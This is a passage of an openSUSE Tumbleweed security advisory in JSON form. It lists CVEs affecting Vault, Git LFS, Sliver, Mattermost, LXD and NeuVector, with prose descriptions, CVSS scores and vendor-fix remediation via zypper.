"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-11621"
},
{
"cve": "CVE-2025-12044",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-12044"
}
],
"notes": [
{
"category": "general",
"text": "Vault and Vault Enterprise (\"Vault\") are vulnerable to an unauthenticated denial of service when processing JSON payloads. This occurs due to a regression from a previous fix for [+HCSEC-2025-24+|https://discuss.hashicorp.com/t/hcsec-2025-24-vault-denial-of-service-though-complex-json-payloads/76393] which allowed for processing JSON payloads before applying rate limits. This vulnerability, CVE-2025-12044, is fixed in Vault Community Edition 1.21.0 and Vault Enterprise 1.16.27, 1.19.11, 1.20.5, and 1.21.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-12044",
"url": "https://www.suse.com/security/cve/CVE-2025-12044"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-12044"
},
{
"cve": "CVE-2025-26625",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-26625"
}
],
"notes": [
{
"category": "general",
"text": "Git LFS is a Git extension for versioning large files. In Git LFS versions 0.5.2 through 3.7.0, when populating a Git repository\u0027s working tree with the contents of Git LFS objects, certain Git LFS commands may write to files visible outside the current Git working tree if symbolic or hard links exist which collide with the paths of files tracked by Git LFS. The git lfs checkout and git lfs pull commands do not check for symbolic links before writing to files in the working tree, allowing an attacker to craft a repository containing symbolic or hard links that cause Git LFS to write to arbitrary file system locations accessible to the user running these commands. As well, when the git lfs checkout and git lfs pull commands are run in a bare repository, they could write to files visible outside the repository. The vulnerability is fixed in version 3.7.1. As a workaround, support for symlinks in Git may be disabled by setting the core.symlinks configuration option to false, after which further clones and fetches will not create symbolic links. However, any symbolic or hard links in existing repositories will still provide the opportunity for Git LFS to write to their targets.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-26625",
"url": "https://www.suse.com/security/cve/CVE-2025-26625"
},
{
"category": "external",
"summary": "SUSE Bug 1252259 for CVE-2025-26625",
"url": "https://bugzilla.suse.com/1252259"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-26625"
},
{
"cve": "CVE-2025-27093",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27093"
}
],
"notes": [
{
"category": "general",
"text": "Sliver is a command and control framework that uses a custom Wireguard netstack. In versions 1.5.43 and earlier, and in development version 1.6.0-dev, the netstack does not limit traffic between Wireguard clients. This allows clients to communicate with each other unrestrictedly, potentially enabling leaked or recovered keypairs to be used to attack operators or allowing port forwardings to be accessible from other implants.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27093",
"url": "https://www.suse.com/security/cve/CVE-2025-27093"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-27093"
},
{
"cve": "CVE-2025-41410",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-41410"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.10.x \u003c= 10.10.2, 10.5.x \u003c= 10.5.10, 10.11.x \u003c= 10.11.2 fail to validate email ownership during Slack import process which allows attackers to create verified user accounts with arbitrary email domains via malicious Slack import data to bypass email-based team access restrictions",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-41410",
"url": "https://www.suse.com/security/cve/CVE-2025-41410"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-41410"
},
{
"cve": "CVE-2025-41443",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-41443"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.5.x \u003c= 10.5.12, 10.11.x \u003c= 10.11.2 fail to properly validate guest user permissions when accessing channel information which allows guest users to discover active public channels and their metadata via the `/api/v4/teams/{team_id}/channels/ids` endpoint",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-41443",
"url": "https://www.suse.com/security/cve/CVE-2025-41443"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-41443"
},
{
"cve": "CVE-2025-54286",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54286"
}
],
"notes": [
{
"category": "general",
"text": "Cross-Site Request Forgery (CSRF) in LXD-UI in Canonical LXD versions \u003e= 5.0 on Linux allows an attacker to create and start container instances without user consent via crafted HTML form submissions exploiting client certificate authentication.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54286",
"url": "https://www.suse.com/security/cve/CVE-2025-54286"
},
{
"category": "external",
"summary": "SUSE Bug 1250945 for CVE-2025-54286",
"url": "https://bugzilla.suse.com/1250945"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-54286"
},
{
"cve": "CVE-2025-54287",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54287"
}
],
"notes": [
{
"category": "general",
"text": "Template Injection in instance snapshot creation component in Canonical LXD (\u003e= 4.0) allows an attacker with instance configuration \npermissions to read arbitrary files on the host system via specially crafted snapshot pattern templates using the Pongo2 template engine.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54287",
"url": "https://www.suse.com/security/cve/CVE-2025-54287"
},
{
"category": "external",
"summary": "SUSE Bug 1250943 for CVE-2025-54287",
"url": "https://bugzilla.suse.com/1250943"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-54287"
},
{
"cve": "CVE-2025-54288",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54288"
}
],
"notes": [
{
"category": "general",
"text": "Information Spoofing in devLXD Server in Canonical LXD versions 4.0 and above on Linux container platforms allows attackers with root privileges within any container to impersonate other containers and obtain their metadata, configuration, and device information via spoofed process names in the command line.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54288",
"url": "https://www.suse.com/security/cve/CVE-2025-54288"
},
{
"category": "external",
"summary": "SUSE Bug 1250939 for CVE-2025-54288",
"url": "https://bugzilla.suse.com/1250939"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-54288"
},
{
"cve": "CVE-2025-54289",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54289"
}
],
"notes": [
{
"category": "general",
"text": "Privilege Escalation in operations API in Canonical LXD \u003c6.5 on multiple platforms allows attacker with read permissions to hijack terminal or console sessions and execute arbitrary commands via WebSocket connection hijacking format",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54289",
"url": "https://www.suse.com/security/cve/CVE-2025-54289"
},
{
"category": "external",
"summary": "SUSE Bug 1250933 for CVE-2025-54289",
"url": "https://bugzilla.suse.com/1250933"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-54289"
},
{
"cve": "CVE-2025-54290",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54290"
}
],
"notes": [
{
"category": "general",
"text": "Information disclosure in image export API in Canonical LXD before 6.5 and 5.21.4 on Linux allows network attackers to determine project existence without authentication via crafted requests using wildcard fingerprints.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54290",
"url": "https://www.suse.com/security/cve/CVE-2025-54290"
},
{
"category": "external",
"summary": "SUSE Bug 1250934 for CVE-2025-54290",
"url": "https://bugzilla.suse.com/1250934"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-54290"
},
{
"cve": "CVE-2025-54291",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54291"
}
],
"notes": [
{
"category": "general",
"text": "Information disclosure in images API in Canonical LXD before 6.5 and 5.21.4 on all platforms allows unauthenticated remote attackers to determine project existence via differing HTTP status code responses.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54291",
"url": "https://www.suse.com/security/cve/CVE-2025-54291"
},
{
"category": "external",
"summary": "SUSE Bug 1250935 for CVE-2025-54291",
"url": "https://bugzilla.suse.com/1250935"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-54291"
},
{
"cve": "CVE-2025-54293",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54293"
}
],
"notes": [
{
"category": "general",
"text": "Path Traversal in the log file retrieval function in Canonical LXD 5.0 LTS on Linux allows authenticated remote attackers to read arbitrary files on the host system via crafted log file names or symbolic links.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54293",
"url": "https://www.suse.com/security/cve/CVE-2025-54293"
},
{
"category": "external",
"summary": "SUSE Bug 1250936 for CVE-2025-54293",
"url": "https://bugzilla.suse.com/1250936"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-54293"
},
{
"cve": "CVE-2025-54469",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54469"
}
],
"notes": [
{
"category": "general",
"text": "A vulnerability was identified in NeuVector, where the enforcer used environment variables CLUSTER_RPC_PORT and CLUSTER_LAN_PORT to generate a command to be executed via popen, without first sanitising their values.\n\n\nThe entry process of the enforcer container is the monitor\n process. When the enforcer container stops, the monitor process checks \nwhether the consul subprocess has exited. To perform this check, the \nmonitor process uses the popen function to execute a shell command that determines whether the ports used by the consul subprocess are still active.\n\n\nThe values of environment variables CLUSTER_RPC_PORT and CLUSTER_LAN_PORT\n are used directly to compose shell commands via popen without \nvalidation or sanitization. This behavior could allow a malicious user \nto inject malicious commands through these variables within the enforcer\n container.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54469",
"url": "https://www.suse.com/security/cve/CVE-2025-54469"
},
{
"category": "external",
"summary": "SUSE Bug 1249340 for CVE-2025-54469",
"url": "https://bugzilla.suse.com/1249340"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-54469"
},
{
"cve": "CVE-2025-54470",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54470"
}
],
"notes": [
{
"category": "general",
"text": "This vulnerability affects NeuVector deployments only when the Report anonymous cluster data option is enabled. When this option is enabled, NeuVector sends anonymous telemetry data to the telemetry server.\n\n\nIn affected versions, NeuVector does not enforce TLS \ncertificate verification when transmitting anonymous cluster data to the\n telemetry server. As a result, the communication channel is susceptible\n to man-in-the-middle (MITM) attacks, where an attacker could intercept \nor modify the transmitted data. Additionally, NeuVector loads the \nresponse of the telemetry server is loaded into memory without size \nlimitation, which makes it vulnerable to a Denial of Service(DoS) \nattack",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54470",
"url": "https://www.suse.com/security/cve/CVE-2025-54470"
},
{
"category": "external",
"summary": "SUSE Bug 1249341 for CVE-2025-54470",
"url": "https://bugzilla.suse.com/1249341"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
